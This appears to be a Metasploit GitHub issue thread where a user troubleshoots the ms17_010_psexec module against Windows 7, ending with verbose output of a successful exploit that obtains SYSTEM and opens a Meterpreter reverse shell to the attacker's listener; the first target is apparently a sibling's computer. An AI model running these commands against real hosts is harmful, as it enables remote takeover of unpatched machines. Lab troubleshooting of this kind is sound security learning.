Metasploit-framework: The server responded with error: STATUS_ACCOUNT_RESTRICTION ms17_010_psexec

What named pipes did the exploit find?

Actually, paste all your output.

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              true             yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   RHOST                 10.0.0.28        yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser               berkhim          no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.14        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.14:4444 
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

i use kali ..
and i not set the smbpass 
i set the smbuser
and the windows victem is windows 7 

```

Is setting SMBUser causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION
Also does the exploit work without setting SMBUser ?

STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.

Also does the exploit work without setting SMBUser ?

In Windows XP I tried without setting a username and password and it succeeded
But on Windows 7 it did not work for me and I saw in another video that it did work
Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s
That's why it's confusing.

What error does it give when you try it without setting SMBUser?

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[] Started reverse TCP handler on 10.0.0.15:4444
[] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.``

Have you checked if the target is vulnerable to ms17_010?

Detecting an accessible named point is I think the entry point, if exploit doesn't find it, then I'm afraid it won't work at all..

yes .
Yes it's my little brothers' computer and I'm learning with it
So I opened Port 445 from the beginning
msf> clear
[*] exec: clear

msf> use auxiliary / scanner / smb / smb_ms17_010
msf proxy (scanner / smb / smb_ms17_010)> set rhosts 10.0.0.28
rhosts => 10.0.0.28
msf auxiliary (scanner / smb / smb_ms17_010)> run

[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed
msf auxiliary (scanner / smb / smb_ms17_010)>``

set VERBOSE true and try again, @elibr1212.

msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28 
rhost => 10.0.0.28
smsf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1 
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1 
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.15:4444 
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) > 

``

What named pipes did the exploit find?

So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.

You either need creds, anonymous access
how do I do it?

If you control the box you're testing, you can use known creds or enable anonymous access via https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously.

@wvu-r7 do we need to add named pipes like COMNAP, COMNODE described in above article to the list?

"If you control the box you're testing"
yes Now I checked the computer
And I see that the sharing service is not working
And that I try to run it in "services"
It does not let turn on the render ..
And I'll look at what you sent.
Well done for the work you do! it's not taken for granted
You are champions

Probably not if they're for IBM mainframes. :P

I opened a virtual machine (windows 7 x86) now lol
And it worked
[] Started reverse TCP handler on 10.0.0.15:4444
[] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[] 10.0.0.21:445 - Connected to named pipe: epmapper
[] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8
[] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020
[] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8
[] 10.0.0.21:445 - Attempting leak #0
[] 10.0.0.21:445 - CONNECTION: 0x872c5010
[] 10.0.0.21:445 - SESSION: 0x9e286058
[] 10.0.0.21:445 - FLINK: 0x97353028
[] 10.0.0.21:445 - InParam: 0x9e2c20dc
[] 10.0.0.21:445 - MID: 0xb03
[-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8
[] 10.0.0.21:445 - Align transaction and leak failed, attempt #0
[] 10.0.0.21:445 - Attempting leak #1
[] 10.0.0.21:445 - CONNECTION: 0x872c5010
[] 10.0.0.21:445 - SESSION: 0x9e286058
[] 10.0.0.21:445 - FLINK: 0x9e2d4050
[] 10.0.0.21:445 - InParam: 0x9e2ce0dc
[] 10.0.0.21:445 - MID: 0xb03
[] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion
[] 10.0.0.21:445 - Control of groom transaction
[] 10.0.0.21:445 - Built a write-what-where primitive...
[] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee
[] 10.0.0.21:445 - Session Data: 0a02b2000000000058d4dd8501000000000000005cf775935cf775930800000010502c87000000000861289e020002000861289e00000000ba12ead606c6d30141b92cd706c6d301ffffffffffffff7fffffffffffffff7f00000000000000000000000000000000000000000000000000000000000000000000000000000000d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00
[] 10.0.0.21:445 - session dat len = 256
[] 10.0.0.21:445 - Session ctx offset = 80
[] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00
[] 10.0.0.21:445 - secCtxAddr: 9e2837d8
[] 10.0.0.21:445 - Reading secCtxData from 9e2837d8
[] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000
[] 10.0.0.21:445 - Overwrote token SID security context with fake context
[+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained!
[] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[] 10.0.0.21:445 - PowerShell found
[] 10.0.0.21:445 - Selecting PowerShell target
[] 10.0.0.21:445 - Powershell command length: 2404
[] 10.0.0.21:445 - Executing the payload...
[] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[] 10.0.0.21:445 - Obtaining a service manager handle...
[] 10.0.0.21:445 - Creating the service...
[+] 10.0.0.21:445 - Successfully created the service
[] 10.0.0.21:445 - Starting the service...
[+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable...
[] 10.0.0.21:445 - Removing the service...
[+] 10.0.0.21:445 - Successfully removed the service
[] 10.0.0.21:445 - Closing service handle...
[] Sending stage (179779 bytes) to 10.0.0.21
[+] 10.0.0.21:445 - SYSTEM session cleaned up.
[*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300

meterpreter > sysinfo
Computer : WIN-IUAS33RLC03
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : he_IL
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

Did you read the module doc? info -d may have been helpful.

I did it through the anonymity as you said ..
And yes thanks.